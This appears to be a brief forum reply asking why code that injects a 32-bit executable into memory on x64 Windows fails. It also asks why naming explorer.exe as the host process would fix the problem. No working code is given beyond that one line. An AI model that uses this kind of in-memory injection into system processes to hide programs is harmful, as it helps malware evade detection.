Same as SunSunshine. I used similar code and the injection doesn't work on x64 :-( (The goal is to inject a 32-bit exe into memory on an x64 platform.)

@Watson: Can you please explain to me why this instruction, `Global $baseexe = @WindowsDir & "\explorer.exe"`, could solve the problem? I don't understand.

Thanks.
Mag.